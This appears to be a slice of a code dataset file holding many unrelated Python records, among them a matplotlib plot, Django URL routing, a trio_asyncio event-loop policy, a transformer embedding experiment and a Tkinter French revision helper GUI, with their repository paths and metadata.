denom_out % f == 0 and num_out % f == 0:\n gcf = f\n f += 1\n num_out //= gcf\n denom_out //= gcf\n######################\n\n print(num_out)\n print(denom_out)\n\nelse:\n print(\"Undefined: Zero demoninator\")\n","sub_path":"csc280/coursework/0908/fraction_adder.py","file_name":"fraction_adder.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"470425600","text":"import App\ndef CreateAI(pShip):\n\n\t#########################################\n\t# Creating CompoundAI BasicAttackMarauder at (48, 163)\n\timport AI.Compound.BasicAttack\n\tpBasicAttackMarauder = AI.Compound.BasicAttack.CreateAI(pShip, \"Marauder\", Difficulty = 0.9)\n\t# Done creating CompoundAI BasicAttackMarauder\n\t#########################################\n\t#########################################\n\t# Creating PlainAI WarpOut at (156, 161)\n\tpWarpOut = App.PlainAI_Create(pShip, \"WarpOut\")\n\tpWarpOut.SetScriptModule(\"Warp\")\n\tpWarpOut.SetInterruptable(1)\n\t# Done creating PlainAI WarpOut\n\t#########################################\n\t#########################################\n\t# Creating SequenceAI Sequence at (23, 260)\n\tpSequence = App.SequenceAI_Create(pShip, \"Sequence\")\n\tpSequence.SetInterruptable(1)\n\tpSequence.SetLoopCount(1)\n\tpSequence.SetResetIfInterrupted(1)\n\tpSequence.SetDoubleCheckAllDone(0)\n\tpSequence.SetSkipDormant(0)\n\t# SeqBlock is at (145, 241)\n\tpSequence.AddAI(pBasicAttackMarauder)\n\tpSequence.AddAI(pWarpOut)\n\t# Done creating SequenceAI Sequence\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI RedAlert at (19, 309)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AlertLevel(App.ShipClass.RED_ALERT)\n\t## The PreprocessingAI:\n\tpRedAlert = App.PreprocessingAI_Create(pShip, \"RedAlert\")\n\tpRedAlert.SetInterruptable(1)\n\tpRedAlert.SetPreprocessingMethod(pScript, \"Update\")\n\tpRedAlert.SetContainedAI(pSequence)\n\t# Done creating PreprocessingAI RedAlert\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (18, 360)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pRedAlert)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode2/E2M2/E2M2_AI_GalorDetect.py","file_name":"E2M2_AI_GalorDetect.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"80999557","text":"from cx_Freeze import setup, Executable\n\ninc=[]\ninc.append(\"sip\")\ninc.append(\"PyQt4.QtCore\")\ninc.append(\"PyQt4.QtGui\")\ninc.append(\"LauePlaneCfg\")\ninc.append(\"StereoCfg\")\n\nopts=dict(includes=inc,\n icon=\"icons/clip.ico\",\n compressed=True,\n base=\"Win32GUI\",\n append_script_to_exe=True,\n optimize=1)\n\n\nsetup(\n name = \"Clip\",\n version = \"3.0c\",\n description = \"The Cologne Laue Indexation Program\",\n executables = [Executable(\"clip.py\")],\n options={\"build_exe\": opts})\n\n","sub_path":"tags/release-1.0beta3/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"554549333","text":"''' 绘制散点图 '''\nimport matplotlib.pyplot as plt\n\ninput_squares = list(range(1001))\nsquares = [x**2 for x in input_squares]\n\n''' 显示点,需要传入一对x,y坐标值 '''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c='red') \n# s参数代表点的大小,edgecolors='none'代表弄掉点的轮廓,c代表点的颜色\n# 设置颜色映射,用法: 将数据集传给c,然后增加cmap参数,设置整个数据集怎么变\n# plt.cm.Blues 代表值小的点颜色浅,值大的点颜色深\n\n''' 要了解pyplot中所有的颜色映射,访问:http://matplotlib.org/,单机Examples,向下滚动到\n Color Examples,再点击colormaps_reference \n'''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c=squares,cmap=plt.cm.Blues)\n''' 设置图参数 '''\nplt.title(\"Square Numbers\",fontsize=24) # 设置图像的标题\nplt.xlabel(\"Value\",fontsize=14) # 设置x轴的标签 \nplt.ylabel(\"Square of Value\",fontsize=14) # 设置y轴的标签\n\n''' 设置刻度标记的大小 '''\nplt.tick_params(axis='both',which='major',labelsize=14)\n''' 显示散点图 '''\nplt.show()\n\n''' 保存图表 '''\n#plt.savefig('1.png',bbox_inches='tight')\n''' 第一个参数是以什么名字保存,第二个参数是省去空白部分 '''","sub_path":"matplotlib/example1/c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"226854586","text":"import datetime as dt\nimport pandas as pd\nimport requests \n\nyesterday = dt.date.today() - dt.timedelta(days=1)\n\napi_url = 'https://earthquake.usgs.gov/fdsnws/event/1/query'\n\napi_args = {\n 'format': 'geojson',\n 'starttime' : yesterday - dt.timedelta(days=30),\n 'endtime' : yesterday\n}\n\nresponse = requests.get(api_url, params=api_args)\nprint(response)\n\nearthquake_json = response.json()\n#print(earthquake_json.keys()) \nprint(earthquake_json['metadata'])\n","sub_path":"Ch02/ch02_api.py","file_name":"ch02_api.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201307456","text":"from django.conf import settings\nfrom django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\n\nfrom yaapi import views as yaapi_view\nfrom yacommon import views as yacommon_view\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n url(r'account/api-auth', include('rest_framework.urls', namespace='rest_framework')),\n url(r'account/api-token-auth', obtain_jwt_token),\n url(r'account/api-token-refresh', refresh_jwt_token),\n url(r'account/api-token-verify', verify_jwt_token),\n url(r'system/info', yacommon_view.SystemInfo.as_view(), name='system_info'),\n url(r'blog/resume', yacommon_view.ResumeInfo.as_view(), name='resume_info'),\n url(r\"^\", include(router.urls)),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'all', yaapi_view.APIRootView.as_view(), name='all_api'),\n ]\n","sub_path":"yadjangoweb/yaapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359334938","text":"import sentencepiece as spm\nimport torch\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport torch.nn as nn\n# vocab loading\nvocab_file = \"/Users/a60058238/Desktop/dev/workspace/nlp-study/Data/kowiki/kowiki.model\"\nvocab = spm.SentencePieceProcessor()\nvocab.load(vocab_file)\n\n# 입력 texts\nlines = [\n \"겨울은 추워요.\",\n \"감기 조심하세요.\"\n]\n\n# text를 tensor로 변환\ninputs = []\nfor line in lines:\n pieces = vocab.encode_as_pieces(line)\n ids = vocab.encode_as_ids(line)\n inputs.append(torch.tensor(ids))\n print(pieces)\n\n# 입력 길이가 다르므로 입력 최대 길이에 맟춰 padding(0)을 추가 해 줌\ninputs = torch.nn.utils.rnn.pad_sequence(inputs, batch_first=True, padding_value=0)\n# shape\nprint(inputs.size())\n# 값\nprint(inputs)\n\nn_vocab = len(vocab) # vocab count\nd_hidn = 128 # hidden size\nnn_emb = torch.nn.Embedding(n_vocab, d_hidn) # embedding 객체\n\ninput_embs = nn_emb(inputs) # input embedding\nprint(input_embs.size())\n\n\"\"\" sinusoid position embedding \"\"\"\ndef get_sinusoid_encoding_table(n_seq, d_hidn):\n def cal_angle(position, i_hidn):\n return position / np.power(10000, 2 * (i_hidn // 2) / d_hidn)\n def get_posi_angle_vec(position):\n return [cal_angle(position, i_hidn) for i_hidn in range(d_hidn)]\n\n sinusoid_table = np.array([get_posi_angle_vec(i_seq) for i_seq in range(n_seq)])\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # even index sin\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # odd index cos\n\n return sinusoid_table\n\n# position encoding 구하는 절\nn_seq = 64\npos_encoding = get_sinusoid_encoding_table(n_seq, d_hidn)\n\nprint (pos_encoding.shape) # 크기 출력\nplt.pcolormesh(pos_encoding, cmap='RdBu')\nplt.xlabel('Depth')\nplt.xlim((0, d_hidn))\nplt.ylabel('Position')\nplt.colorbar()\nplt.show()\n\npos_encoding = torch.FloatTensor(pos_encoding)\nnn_pos = torch.nn.Embedding.from_pretrained(pos_encoding, freeze=True)\n\npositions = torch.arange(inputs.size(1), device=inputs.device, dtype=inputs.dtype).expand(inputs.size(0), inputs.size(1)).contiguous() + 1\npos_mask = inputs.eq(0)\n\npositions.masked_fill_(pos_mask, 0)\npos_embs = nn_pos(positions) # position embedding\n\nprint(inputs)\nprint(positions)\nprint(pos_embs.size())\n\n# Transformer에 사용될 입력\n# input embedding과 postion embedding의 합으로 input_sums 생\ninput_sums = input_embs + pos_embs\n\n#Scale Dot Product Attention에서 입력으로 사용될 Q, K, V\n# Scale Dot Product Attention의 경우 MatMul(softmax(mask(scale(matmul(Q,K), V)\n#\nQ = input_sums\nK = input_sums\nV = input_sums\nattn_mask = inputs.eq(0).unsqueeze(1).expand(Q.size(0), Q.size(1), K.size(1))\nprint(attn_mask.size())\nprint(attn_mask[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 Q * K-transpose 계산분\n# matmul(Q,K) 부분\nscores = torch.matmul(Q, K.transpose(-1, -2))\nprint(scores.size())\nprint(scores[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 d_head**0.5\n# scale 하는 부\nd_head = 64\nscores = scores.mul_(1/d_head**0.5)\nprint(scores.size())\nprint(scores[0])\n\n# Mask(opt) 하는 부분\nscores.masked_fill_(attn_mask, -1e9)\nprint(scores.size())\nprint(scores[0])\n\n#Softmax\nattn_prob = nn.Softmax(dim=-1)(scores)\nprint(attn_prob.size())\nprint(attn_prob[0])\n\n# attn_prov * V\n# attn_prov는 MatMul(softmax(mask(scale(matmul(Q,K), V)에서\n# softmax(mask(scale(matmul(Q,K)) 부분에 해당한다.\ncontext = torch.matmul(attn_prob, V)\nprint(context.size())\n\n\nW_Q = nn.Linear(d_hidn, n_head * d_head)\nW_K = nn.Linear(d_hidn, n_head * d_head)\nW_V = nn.Linear(d_hidn, n_head * d_head)\n\n# (bs, n_seq, n_head * d_head)\nq_s = W_Q(Q)\nprint(q_s.size())\n# (bs, n_seq, n_head, d_head)\nq_s = q_s.view(batch_size, -1, n_head, d_head)\nprint(q_s.size())\n# (bs, n_head, n_seq, d_head)\nq_s = q_s.transpose(1,2)\nprint(q_s.size())\n\n\n\n\n","sub_path":"ETC/inputEmbedding.py","file_name":"inputEmbedding.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180715711","text":"from django.conf import settings\n\nfrom account.models import AdminProfile, EmployerProfile, StudentProfile\n\n__all__ = (\n 'UserProfileMiddleware'\n)\n\n\nclass UserProfileMiddleware(object):\n\n def process_request(self, request):\n \"\"\"Add related profile of user to request object\"\"\"\n if request.user.is_authenticated():\n role_type = request.session.get('role_type', None)\n\n if role_type == settings.ROLE_TYPES.get('admin'):\n request.user_profile = AdminProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('employer'):\n request.user_profile = EmployerProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('student'):\n request.user_profile = StudentProfile.objects.get(user_id=request.user.id)\n\n request.session['role_type'] = role_type\n\n return","sub_path":"account/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"397893605","text":"import numpy as np\nimport cv2\n\n\ndef main_process(img, center_tally):\n mask_zero_area = create_mask_zero_area(img, center_tally)\n zero_area_binary = create_binary(mask_zero_area, img)\n zero_coords = get_zero_coordinates(zero_area_binary)\n\n if zero_coords is None:\n return center_tally\n return zero_coords\n\n\ndef create_mask_zero_area(img, center_tally):\n W, H = img.shape[:2]\n mask = np.zeros((W, H), np.uint8)\n\n size_boundaries = int(W * 0.015)\n\n mask[\n center_tally[1] - size_boundaries: center_tally[1],\n center_tally[0] - size_boundaries: center_tally[0] + size_boundaries] = 1\n\n return mask\n\n\ndef create_binary(mask_zero_area, img):\n\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n channels = cv2.split(img_hsv)\n value = channels[2] * mask_zero_area\n\n mean_masked_value = np.mean(np.ma.masked_where(value == 0, value))\n std_masked_value = np.std(np.ma.masked_where(value == 0, value))\n\n bin = cv2.inRange(value, 0, mean_masked_value - (1.5 * std_masked_value)) * mask_zero_area\n\n return bin\n\n\ndef get_zero_coordinates(zero_binary_area):\n\n contours, hir = cv2.findContours(zero_binary_area, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # Contour Detection\n\n if len(contours) is 0:\n return None\n\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt = contours[max_index]\n\n M = cv2.moments(cnt)\n try:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n return (cx, cy)\n except Exception:\n return None\n\n","sub_path":"backend/processing/image_processing/dial/zero.py","file_name":"zero.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"284444515","text":"'''\nYour function should take in a signle parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n if 'th' in word:\n count = 1\n index = word.find('th') + 2\n remaining_word = word[index:]\n return count + count_th(remaining_word)\n else:\n count = 0\n return count\n\n\n# Or you could just do\n\n# def count_th(word):\n# return word.count('th')","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"362416347","text":"\ngrades = [75,66,84,90,92,100,38,73,22,95]\ncount = 10\n\ni = 0\ntotal = 0\nwhile True:\n if i >= count:\n break\n v = grades[i]\n total = total + v\n i = i + 1\n \n \navg = total / count\n\nprint(avg)","sub_path":"Topics/01_Encapsulation/01_01.5_Compiling/grades1.py","file_name":"grades1.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"398631192","text":"\"\"\"Helper functions to use within OpsDroid.\"\"\"\n\nimport os\nimport stat\nimport shutil\nimport logging\nimport filecmp\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef get_opsdroid():\n \"\"\"Return the running opsdroid instance.\"\"\"\n from opsdroid.core import OpsDroid\n if len(OpsDroid.instances) == 1:\n return OpsDroid.instances[0]\n\n return None\n\n\ndef del_rw(action, name, exc):\n \"\"\"Error handler for removing read only files.\"\"\"\n os.chmod(name, stat.S_IWRITE)\n os.remove(name)\n\n# This is meant to provide backwards compatibility for versions\n# prior to 0.12.0 in the future this will probably be deleted\n\n\ndef move_config_to_appdir(src, dst):\n \"\"\"Copy any .yaml extension in \"src\" to \"dst\" and remove from \"src\".\"\"\"\n yaml_files = [file for file in os.listdir(src)\n if '.yaml' in file[-5:]]\n\n if not os.path.isdir(dst):\n os.mkdir(dst)\n\n for file in yaml_files:\n original_file = os.path.join(src, file)\n copied_file = os.path.join(dst, file)\n shutil.copyfile(original_file, copied_file)\n _LOGGER.info(_('File %s copied from %s to %s '\n 'run opsdroid -e to edit the '\n 'main config file'), file,\n src, dst)\n if filecmp.cmp(original_file, copied_file):\n os.remove(original_file)\n","sub_path":"opsdroid/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"455052983","text":"# This code implements a clone of the asyncio mainloop which hooks into\n# Trio.\n\nimport sys\nimport trio\nimport asyncio\nimport warnings\nimport threading\n\nfrom .util import run_future\nfrom .async_ import TrioEventLoop, open_loop\n\ntry:\n from trio.hazmat import wait_for_child\nexcept ImportError:\n from .child import wait_for_child\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n__all__ = [\n 'run',\n 'run_trio_task',\n 'run_trio',\n 'run_future',\n 'run_coroutine',\n 'run_asyncio',\n 'TrioChildWatcher',\n 'TrioPolicy',\n]\n\n\nclass _TrioPolicy(asyncio.events.BaseDefaultEventLoopPolicy):\n _loop_factory = TrioEventLoop\n\n def __init__(self):\n super().__init__()\n self._trio_local = trio.hazmat.RunLocal(_loop=None, _task=False)\n\n def new_event_loop(self):\n try:\n trio.hazmat.current_task()\n except RuntimeError:\n if 'pytest' not in sys.modules:\n warnings.warn(\n \"trio_asyncio should be used from within a Trio event loop.\",\n DeprecationWarning,\n stacklevel=2\n )\n from .sync import SyncTrioEventLoop\n loop = SyncTrioEventLoop()\n return loop\n else:\n raise RuntimeError(\n \"You're within a Trio environment.\\n\"\n \"Use 'async with open_loop()' instead.\"\n )\n\n def get_event_loop(self):\n \"\"\"Get the current event loop.\n\n Note that this will auto-generate an event loop if none exists, for\n compatibility with asyncio.\n\n To get a Trio-compatible asyncio loop, use\n ``async with trio_asyncio.open_loop() as loop:``.\n\n To test whether an event loop is running, check the loop policy's\n ``.current_event_loop`` property.\n \"\"\"\n try:\n trio.hazmat.current_task()\n except RuntimeError: # no Trio task is active\n # this creates a new loop in the main task\n return super().get_event_loop()\n else:\n return self._trio_local._loop\n\n @property\n def current_event_loop(self):\n \"\"\"The currently-running event loop, if one exists.\"\"\"\n try:\n return self._trio_local._loop\n except RuntimeError:\n # in the main thread this would create a new loop\n # return super().get_event_loop()\n return self._local._loop\n\n def set_event_loop(self, loop):\n \"\"\"Set the current event loop.\"\"\"\n try:\n task = trio.hazmat.current_task()\n except RuntimeError:\n return super().set_event_loop(loop)\n\n # This test will not trigger if you create a new asyncio event loop\n # in a sub-task, which is exactly what we intend to be possible\n if self._trio_local._loop is not None and loop is not None and \\\n self._trio_local._task == task:\n raise RuntimeError('You cannot replace an event loop.')\n self._trio_local._loop = loop\n self._trio_local._task = task\n\n\nclass TrioPolicy(_TrioPolicy, asyncio.DefaultEventLoopPolicy):\n def _init_watcher(self):\n with asyncio.events._lock:\n if self._watcher is None: # pragma: no branch\n self._watcher = TrioChildWatcher()\n if isinstance(threading.current_thread(), threading._MainThread):\n self._watcher.attach_loop(self._trio_local._loop)\n\n if self._watcher is not None and \\\n isinstance(threading.current_thread(), threading._MainThread):\n self._watcher.attach_loop(self._trio_local._loop)\n\n def set_child_watcher(self, watcher):\n if watcher is not None:\n if not isinstance(watcher, TrioChildWatcher):\n # raise RuntimeError(\"You must use a TrioChildWatcher here. \"\n # \"Sorry.\")\n # warnings.warn(\"You must use a TrioChildWatcher.\")\n #\n loop = watcher._loop # ugh.\n watcher.close()\n watcher = TrioChildWatcher()\n watcher.attach_loop(loop)\n super().set_child_watcher(watcher)\n\n\nclass TrioChildWatcher: # (asyncio.AbstractChildWatcher):\n # AbstractChildWatcher not available under Windows\n def __init__(self):\n super().__init__()\n self._callbacks = {} # pid => handler\n\n def attach_loop(self, loop):\n self._loop = loop\n\n async def _waitpid(self, pid, callback, *args):\n returncode = await wait_for_child(pid)\n callback(pid, returncode, *args)\n\n def add_child_handler(self, pid, callback, *args):\n \"\"\"Add a callback to run when a child process terminates.\"\"\"\n h = self._loop.run_trio(self._waitpid, pid, callback, *args)\n self._callbacks[pid] = h\n\n def remove_child_handler(self, pid):\n \"\"\"Remove the callback to run when a child process terminates.\"\"\"\n h = self._callbacks.pop(pid, None)\n if h is None:\n return False\n h.cancel()\n return True\n\n def close(self):\n for pid in list(self._callbacks):\n h = self._callbacks.pop(pid, None)\n if h is None:\n continue\n h.cancel()\n self._loop = None\n\n def __enter__(self):\n return self\n\n def __exit__(self, *tb):\n self.close()\n\n\nasync def run_asyncio(proc, *args):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_asyncio(proc, *args)\n\n\nasync def run_coroutine(fut, scope=None):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_coroutine(fut, scope=scope)\n\n\ndef run_trio(proc, *args):\n \"\"\"Call an asynchronous Trio function from asyncio.\n\n Returns a Future with the result / exception.\n\n Cancelling the future will cancel the Trio task running your\n function, or prevent it from starting if that is still possible.\n\n You need to handle errors yourself.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop): # pragma: no cover\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return loop.run_trio(proc, *args)\n\n\ndef run_trio_task(proc, *args):\n \"\"\"Call an asynchronous Trio function from sync context.\n\n This method queues the task and returns immediately.\n It does not return a value.\n\n An uncaught error will propagate to, and terminate, the trio-asyncio loop.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n loop.run_trio_task(proc, *args)\n\n\ndef run(proc, *args, queue_len=None):\n \"\"\"Like :func:`trio.run`, but adds a context that supports asyncio.\n \"\"\"\n\n async def _run_task(proc, args):\n async with open_loop(queue_len=queue_len):\n return await proc(*args)\n\n trio.run(_run_task, proc, args)\n\n\nasyncio.set_event_loop_policy(TrioPolicy())\n","sub_path":"trio_asyncio/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":7229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"478166927","text":"# Script of derivate computation several h's\n# single point method\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef dfdx(f,x,h):\n return (f(x + h) - f(x - h))/(2*h)\n\nn = 200\nx = np.linspace(0, np.pi /50, n + 1)\nh1 = (np.pi /50 )/ n\nepsilon = 5e-324\nho = np.sqrt( (4*epsilon*100)/(10000))\n\n\ndef sin100x(x):\n return np.sin(100*x)\n\ndydx_1 = dfdx(sin100x,x,h1)\ndydx_2 = dfdx(sin100x,x,ho)\n\ndYdx = 100*np.cos(100*x)\n\n#plt.figure(figsize=(12,5))\nplt.plot(x,dydx_1,'.',label='Approx with adjusting h')\nplt.plot(x,dydx_2,'.',label='Approx with optimal h')\n\nplt.plot(x,dYdx,'b',label='Exact Value')\n\nplt.title('Derivative of y = cos(100x)')\nplt.legend(loc='best')\nplt.show()\n","sub_path":"diff_comp_singlepoint.py","file_name":"diff_comp_singlepoint.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"644720849","text":"import mv3d\nimport mv3d_net\nimport glob\nfrom config import *\nimport utils.batch_loading as ub\nimport argparse\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='training')\n\n all= '%s,%s,%s' % (mv3d_net.top_view_rpn_name ,mv3d_net.imfeature_net_name,mv3d_net.fusion_net_name)\n\n parser.add_argument('-w', '--weights', type=str, nargs='?', default='',\n help='use pre trained weigthts example: -w \"%s\" ' % (all))\n\n parser.add_argument('-t', '--targets', type=str, nargs='?', default=all,\n help='train targets example: -w \"%s\" ' % (all))\n\n parser.add_argument('-i', '--max_iter', type=int, nargs='?', default=1000,\n help='max count of train iter')\n\n parser.add_argument('-n', '--tag', type=str, nargs='?', default='unknown_tag',\n help='set log tag')\n\n parser.add_argument('-c', '--continue_train', type=bool, nargs='?', default=False,\n help='set continue train flag')\n args = parser.parse_args()\n\n print('\\n\\n{}\\n\\n'.format(args))\n tag = args.tag\n if tag == 'unknown_tag':\n tag = input('Enter log tag : ')\n print('\\nSet log tag :\"%s\" ok !!\\n' %tag)\n\n max_iter = args.max_iter\n weights=[]\n if args.weights != '':\n weights = args.weights.split(',')\n\n targets=[]\n if args.targets != '':\n targets = args.targets.split(',')\n\n dataset_dir = cfg.PREPROCESSED_DATA_SETS_DIR\n\n if cfg.DATA_SETS_TYPE == 'didi' or cfg.DATA_SETS_TYPE == 'test':\n training_dataset = {\n '1': ['6_f', '9_f', '10', '13', '20', '21_f', '15', '19'],\n '2': ['3_f', '6_f', '8_f'],\n '3': ['2_f', '4', '6', '8', '7', '11_f']}\n\n validation_dataset = {\n '1': ['15']}\n\n elif cfg.DATA_SETS_TYPE == 'kitti':\n training_dataset = {\n '2011_09_26': ['0001', '0017', '0029', '0052', '0070', '0002', '0018', '0056', '0019',\n '0036', '0005',\n '0057', '0084', '0020', '0039', '0086', '0011', '0023', '0046', '0060', '0091']}\n\n validation_dataset = {\n '2011_09_26': ['0013', '0027', '0048',\n '0061', '0015', '0028', '0051', '0064']\n }\n\n training = ub.batch_loading(dataset_dir, training_dataset)\n\n validation = ub.batch_loading(dataset_dir, validation_dataset)\n\n train = mv3d.Trainer(train_set=training, validation_set=validation,\n pre_trained_weights=weights, train_targets=targets, log_tag=tag,\n continue_train = args.continue_train)\n\n train(max_iter=max_iter)\n\n\n","sub_path":"experiments/archive/exp_002_round1_version_fusion_net_test_num1/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"111612882","text":"# GUI.py\n# Module containing the window classes I am using with TKinter\n# By Hugo Sebesta\n\n# External\nfrom tkinter import *\nfrom time import sleep\nimport os\n# Mine\nfrom Classes import *\nfrom Funcs import *\nfrom SQLDB import *\n\n# Global Vars\n#global actualRadioVariable ?\n\ndef openingDialogueScreen():\n # Default vars:\n dbIP = \"58.168.115.13\"\n dbUser = \"client\"\n dbPass = \"password\"\n db = \"frh\"\n\n openingDialogue = Tk()\n\n title = Label(openingDialogue, text=\"WELCOME\", font=(\"Helvetica\", 44))\n\n frame = LabelFrame(openingDialogue, text=\"Connection Details:\", font=(\"Helvetica\"))\n\n ipEntryText = Label(frame, text=\"Server IP\")\n dbIPStrVar = StringVar(frame, value=dbIP)\n ipEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbIPStrVar)\n\n userEntryText = Label(frame, text=\"Server User\")\n dbUserStrVar = StringVar(frame, value=dbUser)\n userEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbUserStrVar)\n\n passEntryText = Label(frame, text=\"Server Password\")\n dbPassStrVar = StringVar(frame, value=dbPass)\n passEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbPassStrVar)\n\n dbEntryText = Label(frame, text=\"Database\")\n dbStrVar = StringVar(frame, value=db)\n dbEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbStrVar)\n\n # Geometry/layout\n ipEntryText.grid(column=0, row=1)\n ipEntry.grid(column=1, row=1)\n\n userEntryText.grid(column=0, row=2)\n userEntry.grid(column=1, row=2)\n\n passEntryText.grid(column=0, row=3)\n passEntry.grid(column=1, row=3)\n\n dbEntryText.grid(column=0, row=4)\n dbEntry.grid(column=1, row=4)\n\n toReturn = []\n def openingDialogueGoButton():\n toReturn.append(ipEntry.get())\n toReturn.append(userEntry.get())\n toReturn.append(passEntry.get())\n toReturn.append(dbEntry.get())\n openingDialogue.destroy()\n\n go = Button(frame, text=\"Go!\", command=openingDialogueGoButton)\n go.grid(column=1, row=5)\n\n title.grid(column=0, row=0, columnspan=2)\n frame.grid(column=0, row=1, columnspan=3)\n\n openingDialogue.mainloop()\n return toReturn\n\ndef errorInvalidLogin():\n messagebox.showerror(\"ERROR\", \"Invalid login details!\")\n return None\n\nclass mainGUI:\n #master = Tk() This fucking line fucked me over for like two fucking months fuck me\n verbList = []\n nounList = []\n adjectiveList = []\n miscWordList = []\n ruleList = []\n\n def about(self):\n newWin = Tk()\n newWin.title(\"About\")\n title = Label(newWin, text=\"About\", font=(\"Helvetica\"))\n text = Text(newWin)\n text.insert(INSERT, \"French Revision Helper is a small tool made and managed by Hugo Sebesta.\\nIt is based on Python as it was a lot easier.\\nIt's taken a long ass time to make, so u know be a little appreciative or something.\\nAlso if you encounter any issues either email me hugo.sebesta@gmail.com, hsebesta20@student.sacs etc or talk to me in person is probably even easier.\\nThanks for using this software and feel free to let me know how I can improve it.\\nHugo\")\n title.pack()\n text.pack()\n newWin.mainloop()\n return None\n\n def help(self):\n newWin = Tk()\n newWin.title(\"Help\")\n title = Label(newWin, text=\"Help\", font=(\"Helvetica\"))\n text = Text(newWin)\n text.insert(INSERT, \"Email or speak to hugo sebesta at hugo.sebesta@gmail.com for support.\\n:)\")\n title.pack()\n text.pack()\n newWin.mainloop()\n return None\n\n def newWord(self):\n # NOTE: Forgot about comment text for all words except misc\n # if there is demand, properly implement it.\n newWin = Tk()\n # newWord2\n radioVariable = IntVar()\n def newWord2():\n newWin.destroy()\n newWin2 = Tk()\n # This doesn't get set for some reason\n print(radioVariable.get())\n if radioVariable.get() == 0: # 